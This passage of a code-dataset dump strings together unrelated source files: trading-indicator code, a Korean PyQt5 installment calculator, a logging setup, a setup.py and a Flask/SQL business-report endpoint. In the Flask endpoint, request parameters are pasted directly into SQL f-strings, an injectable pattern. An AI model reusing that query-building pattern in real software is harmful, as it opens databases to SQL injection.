\"DEMA\"):\n real = talib.DEMA(close, timeperiod=period)\n df[prefix + \"DEMA\"] = real\n\n if check_indicator(prefix + \"EMA\"):\n real = talib.EMA(close, timeperiod=period)\n df[prefix + \"EMA\"] = real\n\n if check_indicator(prefix + \"KAMA\"):\n real = talib.KAMA(close, timeperiod=period)\n df[prefix + \"KAMA\"] = real\n\n if check_indicator(prefix + \"MIDPOINT\"):\n real = talib.MIDPOINT(close, timeperiod=period)\n df[prefix + \"MIDPOINT\"] = real\n\n if check_indicator(prefix + \"MIDPRICE\"):\n real = talib.MIDPRICE(high, low, timeperiod=period)\n df[prefix + \"MIDPRICE\"] = real\n\n if check_indicator(prefix + \"SMA\"):\n real = talib.SMA(close, timeperiod=period)\n df[prefix + \"SMA\"] = real\n\n if check_indicator(prefix + \"T3\"):\n real = talib.T3(close, timeperiod=period, vfactor=0)\n df[prefix + \"T3\"] = real\n\n if check_indicator(prefix + \"TEMA\"):\n real = talib.TEMA(close, timeperiod=period)\n df[prefix + \"TEMA\"] = real\n\n if check_indicator(prefix + \"TRIMA\"):\n real = talib.TRIMA(close, timeperiod=period)\n df[prefix + \"TRIMA\"] = real\n\n if check_indicator(prefix + \"WMA\"):\n real = talib.WMA(close, timeperiod=period)\n df[prefix + \"WMA\"] = real\n\n # __ __ ___ __ __ _____ _ _ _____ _ _ __ __\n # | \\/ |/ _ \\| \\/ | ____| \\ | |_ _| | | | \\/ |\n # | |\\/| | | | | |\\/| | _| | \\| | | | | | | | |\\/| |\n # | | | | |_| | | | | |___| |\\ | | | | |_| | | | |\n # |_| |_|\\___/|_| |_|_____|_| \\_| |_| \\___/|_| |_|\n if precision_check:\n if check_indicator(prefix + \"ADX\"):\n real = talib.ADX(high, low, close, timeperiod=period)\n df[prefix + \"ADX\"] = real\n\n if check_indicator(prefix + \"ADXR\"):\n real = talib.ADXR(high, low, close, timeperiod=period)\n df[prefix + \"ADXR\"] = real\n\n if check_indicator(prefix + \"APO\"):\n real = talib.APO(close, fastperiod=period05, slowperiod=period, matype=0)\n df[prefix + \"APO\"] = real\n\n if check_indicator(prefix + \"AROONOSC\"):\n real = talib.AROONOSC(high, low, timeperiod=period)\n df[prefix + \"AROONOSC\"] = real\n\n if check_indicator(prefix + \"CCI\"):\n real = talib.CCI(high, low, close, timeperiod=period)\n df[prefix + \"CCI\"] 
= real\n\n if precision_check:\n if check_indicator(prefix + \"CMO\"):\n real = talib.CMO(close, timeperiod=period)\n df[prefix + \"CMO\"] = real\n\n if check_indicator(prefix + \"DX\"):\n real = talib.DX(high, low, close, timeperiod=period)\n df[prefix + \"DX\"] = real\n\n if check_indicator(prefix + \"MFI\"):\n real = talib.MFI(high, low, close, volume, timeperiod=period)\n df[prefix + \"MFI\"] = real\n\n if check_indicator(prefix + \"MINUS_DI\"):\n real = talib.MINUS_DI(high, low, close, timeperiod=period)\n df[prefix + \"MINUS_DI\"] = real\n\n if check_indicator(prefix + \"MINUS_DM\"):\n real = talib.MINUS_DM(high, low, timeperiod=period)\n df[prefix + \"MINUS_DM\"] = real\n\n if check_indicator(prefix + \"MOM\"):\n real = talib.MOM(close, timeperiod=period)\n df[prefix + \"MOM\"] = real\n\n if check_indicator(prefix + \"PLUS_DI\"):\n real = talib.PLUS_DI(high, low, close, timeperiod=period)\n df[prefix + \"PLUS_DI\"] = real\n\n if check_indicator(prefix + \"PLUS_DM\"):\n real = talib.PLUS_DM(high, low, timeperiod=period)\n df[prefix + \"PLUS_DM\"] = real\n\n if check_indicator(prefix + \"PPO\"):\n real = talib.PPO(close, fastperiod=period05, slowperiod=period, matype=0)\n df[prefix + \"PPO\"] = real\n\n if check_indicator(prefix + \"ROC\"):\n real = talib.ROC(close, timeperiod=period)\n df[prefix + \"ROC\"] = real\n\n if check_indicator(prefix + \"ROCP\"):\n real = talib.ROCP(close, timeperiod=period)\n df[prefix + \"ROCP\"] = real\n\n if check_indicator(prefix + \"ROCR\"):\n real = talib.ROCR(close, timeperiod=period)\n df[prefix + \"ROCR\"] = real\n\n if check_indicator(prefix + \"ROCR100\"):\n real = talib.ROCR100(close, timeperiod=period)\n df[prefix + \"ROCR100\"] = real\n\n if check_indicator(prefix + \"RSI\"):\n real = talib.RSI(close, timeperiod=period)\n df[prefix + \"RSI\"] = real\n\n if check_indicator(prefix + \"TRIX\"):\n real = talib.TRIX(close, timeperiod=period)\n df[prefix + \"TRIX\"] = real\n\n if check_indicator(prefix + \"ULTOSC\"):\n real = talib.ULTOSC(high, low, close, timeperiod1=period05, timeperiod2=period07, timeperiod3=period)\n df[prefix + \"ULTOSC\"] = real\n\n if check_indicator(prefix + \"WILLR\"):\n real = talib.WILLR(high, low, close, timeperiod=period)\n df[prefix + \"WILLR\"] = real\n\n if check_indicator(prefix + \"aroon\"):\n aroondown, aroonup = talib.AROON(high, low, timeperiod=period)\n df[prefix + \"aroondown\"] = aroondown\n df[prefix + \"aroonup\"] = aroonup\n\n if check_indicator(prefix + \"macd\"):\n macd, macdsignal, macdhist = talib.MACD(close, fastperiod=period05, slowperiod=period, signalperiod=period07)\n df[prefix + \"macd\"] = macd\n df[prefix + \"macdsignal\"] = macdsignal\n df[prefix + \"macdhist\"] = macdhist\n\n # macd, macdsignal, macdhist = talib.MACDEXT(close, fastperiod=period05, fastmatype=0, slowperiod=period, slowmatype=0, signalperiod=period07, signalmatype=0)\n # df[prefix + \"macd2\"] = macd\n # df[prefix + \"macdsignal2\"] = macdsignal\n # df[prefix + \"macdhist2\"] = macdhist\n\n # macd, macdsignal, macdhist = talib.MACDFIX(close, signalperiod=period)\n # df[prefix + \"macd3\"] = macd\n # df[prefix + \"macdsignal3\"] = macdsignal\n # df[prefix + \"macdhist3\"] = macdhist\n\n if check_indicator(prefix + \"slow\"):\n slowk, slowd = talib.STOCH(high, low, close, fastk_period=period05, slowk_period=period, slowk_matype=0, slowd_period=period, slowd_matype=0)\n df[prefix + \"slowk\"] = slowk\n df[prefix + \"slowd\"] = slowd\n\n if check_indicator(prefix + \"fast\"):\n fastk, fastd = talib.STOCHF(high, low, close, 
fastk_period=period05, fastd_period=period, fastd_matype=0)\n df[prefix + \"fastk\"] = fastk\n df[prefix + \"fastd\"] = fastd\n\n if check_indicator(prefix + \"fast\"):\n fastk, fastd = talib.STOCHRSI(close, timeperiod=period, fastk_period=period05, fastd_period=period03, fastd_matype=0)\n df[prefix + \"fastk2\"] = fastk\n df[prefix + \"fastd2\"] = fastd\n\n # __ _____ _ _ _ __ __ _____\n # \\ \\ / / _ \\| | | | | | \\/ | ____|\n # \\ \\ / / | | | | | | | | |\\/| | _|\n # \\ V /| |_| | |__| |_| | | | | |___\n # \\_/ \\___/|_____\\___/|_| |_|_____|\n if check_indicator(prefix + \"ADOSC\"): \n real = talib.ADOSC(high, low, close, volume, fastperiod=period03, slowperiod=period)\n df[prefix + \"ADOSC\"] = real\n\n # __ _____ _ _ _____ ___ _ ___ _______ __\n # \\ \\ / / _ \\| | / \\|_ _|_ _| | |_ _|_ _\\ \\ / /\n # \\ \\ / / | | | | / _ \\ | | | || | | | | | \\ V /\n # \\ V /| |_| | |___ / ___ \\| | | || |___ | | | | | |\n # \\_/ \\___/|_____/_/ \\_\\_| |___|_____|___| |_| |_|\n if check_indicator(prefix + \"ATR\"): \n real = talib.ATR(high, low, close, timeperiod=period)\n df[prefix + \"ATR\"] = real\n\n if check_indicator(prefix + \"NATR\"):\n real = talib.NATR(high, low, close, timeperiod=period)\n df[prefix + \"NATR\"] = real\n\n # ____ _____ _ _____ ___ ____ _____ ___ ____ ____\n # / ___|_ _|/ \\|_ _|_ _/ ___|_ _|_ _/ ___/ ___|\n # \\___ \\ | | / _ \\ | | | |\\___ \\ | | | | | \\___ \\\n # ___) || |/ ___ \\| | | | ___) || | | | |___ ___) |\n # |____/ |_/_/ \\_\\_| |___|____/ |_| |___\\____|____/\n if check_indicator(prefix + \"BETA\"): \n real = talib.BETA(high, low, timeperiod=period)\n df[prefix + \"BETA\"] = real\n\n if check_indicator(prefix + \"CORREL\"):\n real = talib.CORREL(high, low, timeperiod=period)\n df[prefix + \"CORREL\"] = real\n\n if check_indicator(prefix + \"LINEARREG\"):\n real = talib.LINEARREG(close, timeperiod=period)\n df[prefix + \"LINEARREG\"] = real\n\n if check_indicator(prefix + \"LINEARREG_ANGLE\"):\n real = talib.LINEARREG_ANGLE(close, timeperiod=period)\n df[prefix + \"LINEARREG_ANGLE\"] = real\n\n if check_indicator(prefix + \"LINEARREG_INTERCEPT\"):\n real = talib.LINEARREG_INTERCEPT(close, timeperiod=period)\n df[prefix + \"LINEARREG_INTERCEPT\"] = real\n\n if check_indicator(prefix + \"LINEARREG_SLOPE\"):\n real = talib.LINEARREG_SLOPE(close, timeperiod=period)\n df[prefix + \"LINEARREG_SLOPE\"] = real\n\n if check_indicator(prefix + \"STDDEV\"):\n real = talib.STDDEV(close, timeperiod=period, nbdev=1)\n df[prefix + \"STDDEV\"] = real\n\n if check_indicator(prefix + \"TSF\"):\n real = talib.TSF(close, timeperiod=period)\n df[prefix + \"TSF\"] = real\n\n if check_indicator(prefix + \"VAR\"):\n real = talib.VAR(close, timeperiod=period, nbdev=1)\n df[prefix + \"VAR\"] = real\n\n # _____ ___ _ _ _____ _\n # | ___|_ _| \\ | |_ _|/ \\\n # | |_ | || \\| | | | / _ \\\n # | _| | || |\\ | | |/ ___ \\\n # |_| |___|_| \\_| |_/_/ \\_\\\n set_cols()\n #if check_indicator_add(\"VWAP\", prefix):\n # real = fin_custom.VWAP(df, period=period)\n # add(\"VWAP\", real, prefix)\n #\n #if check_indicator_add(\"CFI\", prefix):\n # real = fin_custom.CFI(df, period=period)\n # add(\"CFI\", real, prefix)\n #\n #if check_indicator_add(\"VPT\", prefix):\n # real = fin_custom.VPT(df, period=period)\n # add(\"VPT\", real, prefix)\n #\n #if check_indicator_add(\"ADL\", prefix):\n # tmp = fin_custom.ADL(df, period=period)\n # add(\"ADL\", tmp, prefix)\n #\n #if check_indicator_add(\"OBV\", prefix):\n # tmp = fin_custom.OBV(df, period=period)\n # add(\"OBV\", tmp, prefix)\n \n if 
check_indicator_add(\"WMA\", prefix):\n real = fin.WMA(df, period=period)\n add(\"WMA\", real, prefix)\n \n if check_indicator_add(\"HMA\", prefix):\n real = fin.HMA(df, period=period)\n add(\"HMA\", real, prefix)\n \n if check_indicator_add(\"PPO\", prefix):\n real = fin.PPO(df, period_fast=period05, period_slow=period, signal=period03)\n add(\"PPO\", real, prefix)\n \n if check_indicator_add(\"EVWMA\", prefix):\n #real = fin.EVWMA(df, period=period)\n #add(\"EVWMA\", real, prefix)\n pass\n \n if check_indicator_add(\"IFT_RSI\", prefix):\n real = fin.IFT_RSI(df, rsi_period=period05, wma_period=period)\n add(\"IFT_RSI\", real, prefix)\n \n if check_indicator_add(\"FVE\", prefix):\n real = fin.FVE(df, period=period)\n add(\"FVE\", real, prefix)\n \n if check_indicator_add(\"VFI\", prefix):\n real = fin.VFI(df, period=period)\n add(\"VFI\", real, prefix)\n \n if check_indicator_add(\"STC\", prefix):\n #real = fin.STC(df, period_fast=period05, period_slow=period, period=period02)\n #add(\"STC\", real, prefix)\n pass\n \n if check_indicator_add(\"AO\", prefix):\n real = fin.AO(df, slow_period=period * 2, fast_period=period05)\n add(\"AO\", real, prefix)\n \n if check_indicator_add(\"MI\", prefix):\n real = fin.MI(df, period=period)\n add(\"MI\", real, prefix)\n \n if check_indicator_add(\"VORTEX\", prefix):\n real = fin.VORTEX(df, period=period)\n add(\"VORTEX\", real, prefix)\n \n if check_indicator_add(\"VZO\", prefix):\n real = fin.VZO(df, period=period)\n add(\"VZO\", real, prefix)\n \n if check_indicator_add(\"PZO\", prefix):\n real = fin.PZO(df, period=period)\n add(\"PZO\", real, prefix)\n \n if check_indicator_add(\"EFI\", prefix):\n real = fin.EFI(df, period=period)\n add(\"EFI\", real, prefix)\n \n if check_indicator_add(\"EMV\", prefix):\n real = fin.EMV(df, period=period)\n add(\"EMV\", real, prefix)\n \n if check_indicator_add(\"CCI\", prefix):\n real = fin.CCI(df, period=period)\n add(\"CCI\", real, prefix)\n \n if check_indicator_add(\"BASP\", prefix):\n real = fin.BASP(df, period=period)\n add(\"BASP\", real, prefix)\n \n if check_indicator_add(\"WTO\", prefix):\n real = fin.WTO(df, channel_lenght=period05, average_lenght=period)\n add(\"WTO\", real, prefix)\n \n if check_indicator_add(\"FISH\", prefix):\n real = fin.FISH(df, period=period)\n add(\"FISH\", real, prefix)\n \n if check_indicator_add(\"TSI\", prefix):\n tmp = fin.TSI(df, long=period, short=period05, signal=period05)\n add(\"TSI\", tmp, prefix)\n \n if check_indicator_add(\"MFI\", prefix):\n tmp = fin.MFI(df, period=period)\n add(\"MFI\", tmp, prefix)\n \n if check_indicator_add(\"ICHIMOKU\", prefix):\n tmp = fin.ICHIMOKU(df, tenkan_period=period02, kijun_period=period05, senkou_period=period, chikou_period=period05, )\n add(\"ICHIMOKU\", tmp, prefix)\n \n if check_indicator_add(\"APZ\", prefix):\n tmp = fin.APZ(df, period=period)\n add(\"APZ\", tmp, prefix)\n \n if check_indicator_add(\"SQZMI\", prefix):\n tmp = fin.SQZMI(df, period=period)\n add(\"SQZMI\", tmp, prefix)\n \n if check_indicator_add(\"KC\", prefix):\n tmp = fin.KC(df, period=period, atr_period=period05)\n add(\"KC\", tmp, prefix)\n \n if check_indicator_add(\"DO\", prefix):\n tmp = fin.DO(df, upper_period=period, lower_period=period03)\n add(\"DO\", tmp, prefix)\n \n if check_indicator_add(\"DMI\", prefix):\n tmp = fin.DMI(df, period=period)\n add(\"DMI\", tmp, prefix)\n\n # ____ _ _ ____ _____ ___ __ __\n # / ___| | | / ___|_ _/ _ \\| \\/ |\n # | | | | | \\___ \\ | || | | | |\\/| |\n # | |___| |_| |___) || || |_| | | | |\n # \\____|\\___/|____/ |_| 
\\___/|_| |_|\n #if check_indicator_add(\"consolidation_zones\", prefix):\n # #tmp = cust.consolidation_zones(df, period, period05)\n # #add(\"consolidation_zones\", tmp, prefix)\n # pass\n #\n #if check_indicator_add(\"trendflex\", prefix):\n # tmp = cust.trendflex(df, period, source=\"close\")\n # add(\"trendflex\", tmp, prefix)\n #\n #if check_indicator_add(\"mesa_mama\", prefix):\n # tmp = cust.mesa_mama(df, fastLimit=0.25, slowLimit=0.05, warmUpPeriod=period)\n # add(\"mesa_mama\", tmp, prefix)\n #\n #if check_indicator_add(\"hurst_cycle\", prefix):\n # tmp = cust.hurst_cycle(df, scl_t=period03, mcl_t=period, scm=1, mcm=3, prefix=\"\")\n # add(\"hurst_cycle\", tmp, prefix)\n #\n #if check_indicator_add(\"compute_Hc\", prefix):\n # tmp = cust.compute_Hc(close, kind=\"random_walk\", min_window=period, max_window=None, simplified=True)\n # add(\"compute_Hc\", tmp, prefix)\n #\n #if check_indicator_add(\"fractal_dimension_index\", prefix):\n # tmp = cust.fractal_dimension_index(df, period)\n # add(\"fractal_dimension_index\", tmp, prefix)\n #\n #if check_indicator_add(\"donchian_channel\", prefix):\n # tmp = cust.donchian_channel(df, period, _min_periods=None, _fillna=True, _offset=0)\n # add(\"donchian_channel\", tmp, prefix)\n #\n #if check_indicator_add(\"fractal_sr\", prefix):\n # tmp = cust.fractal_sr(df, period)\n # add(\"fractal_sr\", tmp, prefix)\n #\n #if check_indicator_add(\"wavepm\", prefix):\n # tmp = cust.wave_pm(close, window=period)\n # add(\"wavepm\", tmp, prefix)\n #\n #if check_indicator_add(\"adr\", prefix):\n # tmp = cust.adr(df)\n # add(\"adr\", tmp, prefix)\n\n return df\n","repo_name":"flamingrickpat/genopt","sub_path":"indicator_util.py","file_name":"indicator_util.py","file_ext":"py","file_size_in_byte":40328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7755056122","text":"# phone.py\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QTextEdit,\r\n\tQPushButton, QButtonGroup, QCheckBox, QLineEdit, QMessageBox, QDoubleSpinBox,\r\n\tQComboBox, QSpinBox, QHBoxLayout, QVBoxLayout, QGridLayout, QFormLayout)\r\nfrom PyQt5.QtGui import QPixmap, QFont\r\nfrom PyQt5.QtCore import QCoreApplication, Qt\r\n\r\n# QLineEdit : 1줄만 입력 가능\r\n# QTextEdit : 여러줄 입력 가능\r\n\r\nclass AppForm(QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__() # QWidget의 기본 생성자 부름\r\n\t\tself.initializeUI()\r\n\r\n\tdef initializeUI(self):\r\n\t\t\"\"\"\r\n\t\t윈도우 화면에 출력되는 컨텐츠 초기화\r\n\t\t\"\"\"\r\n\t\tself.setGeometry(100, 100, 600, 400) # 창 위치 지정\r\n\t\tself.setWindowTitle(\"Todo List\") # 창 캡션\r\n\t\tself.phoneWidgets()\r\n\t\tself.show() \r\n\r\n\tdef phoneWidgets(self):\r\n\t\ttitle = QLabel(\"휴대폰 월 할부금 구하기\")\r\n\t\ttitle.setFont(QFont(\"Arial\", 24))\r\n\t\ttitle.setAlignment(Qt.AlignCenter)\r\n\r\n\t\tpay_money_title = QLabel(\"할부원금 : \")\r\n\t\tpay_money_title.setFont(QFont(\"Ariel\", 16))\r\n\t\tpay_money_title.setAlignment(Qt.AlignLeft)\r\n\t\tself.pay_money = QLineEdit(self)\r\n\t\tself.pay_money.setPlaceholderText(\"원\")\r\n\r\n\t\tpay_month_title = QLabel(\"할부개월수 : \")\r\n\t\tpay_month_title.setFont(QFont(\"Ariel\", 16))\r\n\t\tpay_month_title.setAlignment(Qt.AlignLeft)\r\n\t\tself.pay_month = QLineEdit(self)\r\n\t\tself.pay_month.setPlaceholderText(\"개월\")\r\n\r\n\t\tpay_rate_title = QLabel(\"할부수수료(년이율 %) : \")\r\n\t\tpay_rate_title.setFont(QFont(\"Ariel\", 16))\r\n\t\tpay_rate_title.setAlignment(Qt.AlignLeft)\r\n\t\tself.pay_rate = QDoubleSpinBox(self)\r\n\r\n\t\tcal_button = 
QPushButton(\"계산\")\r\n\t\tcal_button.clicked.connect(self.CalculateMoney)\r\n\t\tcal_button.setFont(QFont(\"Ariel\", 18))\r\n\r\n\t\tself.result = QLabel(\"월 할부금 : \", self)\r\n\t\tself.result.setFont(QFont(\"Ariel\", 20))\r\n\t\tself.result.setAlignment(Qt.AlignCenter)\r\n\r\n\t\tform = QFormLayout()\r\n\t\tform.addRow(title)\r\n\t\tform.addRow(pay_money_title, self.pay_money)\r\n\t\tform.addRow(pay_month_title, self.pay_month)\r\n\t\tform.addRow(pay_rate_title, self.pay_rate)\r\n\t\tform.addRow(cal_button)\r\n\t\tform.addRow(self.result)\r\n\r\n\t\tself.setLayout(form)\r\n\r\n\r\n\tdef CalculateMoney(self):\r\n\t\tp = int(self.pay_money.text())\r\n\t\tn = int(self.pay_month.text()) \r\n\t\tr = float(self.pay_rate.value()) / 1200 \r\n\t\tresult_cal = int(p * ((r * (pow((1 + r), n)) / (pow((1 + r), n) - 1) )))\r\n\t\tself.result.setText(f\"월 할부금 : {result_cal} 원\")\r\n\r\n# 프로그램 실행\r\nif __name__ == '__main__':\r\n\tapp = QApplication(sys.argv) # sys.argv\r\n\t# print(sys.argv)\r\n\twindow = AppForm()\r\n\tsys.exit(app.exec_())\r\n","repo_name":"splendorsu/pyqt5-2022","sub_path":"phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73037590887","text":"import logging.config\nfrom logging import NullHandler\nfrom os.path import expanduser, join, dirname\nfrom os import makedirs\n\nlogging.getLogger(__name__).addHandler(NullHandler())\nLOG_PATH = expanduser(join('~', '.studdp', 'studdp.log'))\nmakedirs(dirname(LOG_PATH), exist_ok=True)\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'\n },\n 'minimal': {\n 'format': '[%(levelname)s]: %(message)s'\n }\n },\n 'handlers': {\n 'default': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'minimal'\n },\n 'file_handler': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'formatter': 'standard',\n 'filename': LOG_PATH\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['default', 'file_handler'],\n 'level': 'DEBUG',\n 'propagate': True\n }\n }\n})\n\nlogging.info(\"Logging initialized\")\n","repo_name":"CogSciUOS/StudDP","sub_path":"studdp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72546386407","text":"#nhập một chuỗi tối đa 10 kí tự và in chuỗi\n#in ra màn hình: chiều dài chuỗi, số khoảng trắng\n#chuyển chuỗi sang chữ in HOA và in chuỗi\n\na=11\nwhile a>10:\n\tx = input(\"Nhập chuỗi tối đa 10 kí tự:\") #input\n\ta= len(x)\n\n\nb=0 #biến đếm khoảng trắng\n\nfor i in range(0,a):\n\tif x[i]==\" \":\n\t\tb+=1\n#ouput\t\t\nprint(\"Chuỗi sau khi in HOA: \",x.upper())\nprint(\"Số khoảng trắng: \", b)\nprint(\"Chiều dài chuỗi: \", a)","repo_name":"Chi68P1/Lap_trinh_python","sub_path":"BT/BT7.py","file_name":"BT7.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3413522618","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='lightwave',\n version='0.24',\n description='Python library to provide a reliable communication link with LightWaveRF lights, switches and TRVs.',\n url='https://github.com/GeoffAtHome/lightwave',\n author='Geoff Soord',\n 
author_email='geoff@soord.org.uk',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='MIT',\n packages=setuptools.find_packages(),\n keywords=['Lightwave', 'LightwaveRF',\n 'Lightwave WiFiLink', 'Lightwave Link'],\n zip_safe=False\n)\n","repo_name":"GeoffAtHome/lightwave","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5628153917","text":"# -*- coding: utf-8 -*-\n# @Author : Joshua\n# @File : product_big_style_info\n\nfrom flask import jsonify, request\nfrom bi_flask.__token import __token_wrapper\nimport logging\nimport json\nfrom bi_flask._sessions import sessions, sessions_scopes\nfrom bi_flask.utils import *\nfrom bi_flask.goods.api import good\n\nlogger = logging.getLogger('bi')\nScope = sessions_scopes(sessions)\n\n\n@good.route('/get_category_class_big_style_info', methods=['GET'], endpoint='get_category_class_big_style_info')\n@__token_wrapper\ndef get_category_class_big_style_info(context):\n '''\n 获取年度品类企划\n :param context:\n :return:\n '''\n try:\n business_id = request.args.get('business_id')\n doc_year = request.args.get('year')\n filter = request.args.get('filter')\n if filter is None or filter == '':\n context['data'] = []\n context['total'] = {'spring': 0, 'summer': 0, 'autumn': 0, 'winter': 0}\n return jsonify(context)\n if 'OEM' in filter and 'ODM' in filter:\n oem_sql = \"\"\" \"\"\"\n elif 'OEM' in filter:\n oem_sql = \"\"\" and d.is_ODM=0 \"\"\"\n elif 'ODM' in filter:\n oem_sql = \"\"\" and d.is_ODM=1 \"\"\"\n else:\n oem_sql = \"\"\" \"\"\"\n if '延续款' in filter:\n if 'OEM' in filter or 'ODM' in filter:\n product_sql = \"\"\" \"\"\"\n else:\n product_sql = \"\"\" and d.tag='延续款' \"\"\"\n else:\n product_sql = \"\"\" and d.tag<>'延续款' \"\"\"\n\n sql = f\"\"\"\n SELECT a.doc_season,a.big_category,a.category,a.product_dev_plan,ifnull(b.product_count,0) as product_count from(\n SELECT doc_season ,m.big_category,d.category,sum(d.plan_nums ) as product_dev_plan\n FROM bi_big_category_plan d \n left join hmcdata.big_style_mapper m on d.category =m.category \n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n where d.doc_year=:doc_year and n.business_id=:business_id\n GROUP BY doc_season ,m.big_category,d.category\n )a left join(\n SELECT ifnull(category,'其他') as category ,count(DISTINCT product_sn) as product_count,doc_season \n FROM hmcdata.bi_product_season_plan_category_detail d\n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n where doc_year=:doc_year and n.business_id=:business_id {oem_sql} {product_sql} -- and product_style is not null\n GROUP by category,doc_season\n )b on a.doc_season=b.doc_season and a.category=b.category\n union\n SELECT b.doc_season,ifnull(b.big_category,'其他') as big_category,b.category,ifnull(a.product_dev_plan,0) as product_dev_plan,ifnull(b.product_count,0) as product_count from(\n SELECT doc_season ,d.category,sum(d.plan_nums ) as product_dev_plan\n FROM hmcdata.bi_big_category_plan d \n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n where d.doc_year=:doc_year and n.business_id=:business_id \n GROUP BY doc_season ,d.category\n )a right join(\n SELECT m.big_category,ifnull(d.category,'其他') as category ,count(DISTINCT product_sn) as product_count,doc_season \n FROM 
hmcdata.bi_product_season_plan_category_detail d\n left join bi_business_brand_new n on d.category_class=n.CategoryClass and d.is_online=n.is_online\n left join hmcdata.big_style_mapper m on d.category =m.category \n where doc_year=:doc_year and n.business_id=:business_id {oem_sql} {product_sql} -- and product_style is not null\n GROUP by d.category,doc_season,m.big_category\n )b on a.doc_season=b.doc_season and a.category=b.category\n \"\"\"\n ret = Scope['bi_saas'].execute(sql, {'doc_year': doc_year, 'business_id': business_id})\n columns = ret.keys()\n data = []\n for rank, val in enumerate(ret):\n data_dict = {}\n for i, column in enumerate(columns):\n if isinstance(val[i], decimal.Decimal):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.datetime):\n data_dict[column] = datetime_format(val[i])\n elif isinstance(val[i], float):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.date):\n data_dict[column] = date_format(val[i])\n elif val[i] is None:\n data_dict[column] = 0\n else:\n data_dict[column] = val[i]\n data.append(data_dict)\n hash_dict = {}\n total_obj = {'spring': 0, 'summer': 0, 'autumn': 0, 'winter': 0}\n for val in data:\n if val['big_category'] in hash_dict:\n hash_dict[val['big_category']].append(val)\n else:\n hash_dict[val['big_category']] = []\n hash_dict[val['big_category']].append(val)\n\n if val['doc_season'] == '春季':\n total_obj['spring'] += val['product_count']\n elif val['doc_season'] == '夏季':\n total_obj['summer'] += val['product_count']\n elif val['doc_season'] == '秋季':\n total_obj['autumn'] += val['product_count']\n elif val['doc_season'] == '冬季':\n total_obj['winter'] += val['product_count']\n\n context['data'] = hash_dict\n context['total'] = total_obj\n\n return jsonify(context)\n finally:\n Scope['bi_saas'].remove()\n\n\n@good.route('/get_category_big_style_detail', methods=['GET'], endpoint='get_category_big_style_detail')\n@__token_wrapper\ndef get_category_big_style_detail(context):\n '''\n 获取年度风格线企划明细\n :param context:\n :return:\n '''\n try:\n business_id = request.args.get('business_id')\n doc_year = request.args.get('year')\n category = request.args.get('category')\n big_category = request.args.get('big_category')\n season = request.args.get('season')\n filter = request.args.get('filter')\n if category is not None and category != \"其他\":\n product_style_sql = f\"\"\" and d.category='{category}' \"\"\"\n # elif category == \"其他\":\n # product_style_sql = f\"\"\" and d.category is null \"\"\"\n else:\n product_style_sql = \"\"\n if big_category is not None and big_category != \"其他\":\n big_style_sql = f\"\"\" and m.big_category='{big_category}' \"\"\"\n # elif big_category == \"其他\":\n # big_style_sql = f\"\"\" and d.big_style is null \"\"\"\n else:\n big_style_sql = \"\"\n if filter is None or filter == '':\n context['data'] = []\n return jsonify(context)\n if 'OEM' in filter and 'ODM' in filter:\n oem_sql = \"\"\" \"\"\"\n elif 'OEM' in filter:\n oem_sql = \"\"\" and d.is_ODM=0 \"\"\"\n elif 'ODM' in filter:\n oem_sql = \"\"\" and d.is_ODM=1 \"\"\"\n else:\n oem_sql = \"\"\" \"\"\"\n if '延续款' in filter:\n if 'OEM' in filter or 'ODM' in filter:\n product_sql = \"\"\" \"\"\"\n else:\n product_sql = \"\"\" and d.tag='延续款' \"\"\"\n else:\n product_sql = \"\"\" and d.tag<>'延续款' \"\"\"\n\n sql = f\"\"\"\n select a.*,i.img_src from (\n SELECT doc_season,product_sn,sum(stock_nums+production_onway_nums) as total_stock,sum(planorder_nums) as planorder_nums,fixed_price,\n ifnull(d.category,'未知') as 
category,ifnull(big_category,'未知') as big_category FROM hmcdata.bi_product_season_plan_category_detail d\n left join hmcdata.big_style_mapper m on d.category =m.category \n where doc_year=:doc_year and doc_season=:doc_season {product_style_sql} {big_style_sql} {oem_sql} {product_sql} and exists (\n select 1 from bi_business_brand_new n where n.business_id=:business_id and d.category_class=n.CategoryClass and d.is_online=n.is_online \n ) and product_style is not null\n group by product_sn,fixed_price,category,doc_season,big_category\n )a left join bi_product_img i on a.product_sn=i.product_sn\n \"\"\"\n ret = Scope['bi_saas'].execute(sql, {'doc_year': doc_year, 'business_id': business_id, 'doc_season': season})\n columns = ret.keys()\n data = []\n for rank, val in enumerate(ret):\n data_dict = {}\n for i, column in enumerate(columns):\n if isinstance(val[i], decimal.Decimal):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.datetime):\n data_dict[column] = datetime_format(val[i])\n elif isinstance(val[i], float):\n data_dict[column] = format_4(val[i])\n elif isinstance(val[i], datetime.date):\n data_dict[column] = date_format(val[i])\n elif val[i] is None:\n data_dict[column] = 0\n else:\n data_dict[column] = val[i]\n data.append(data_dict)\n context['data'] = data\n\n return jsonify(context)\n finally:\n 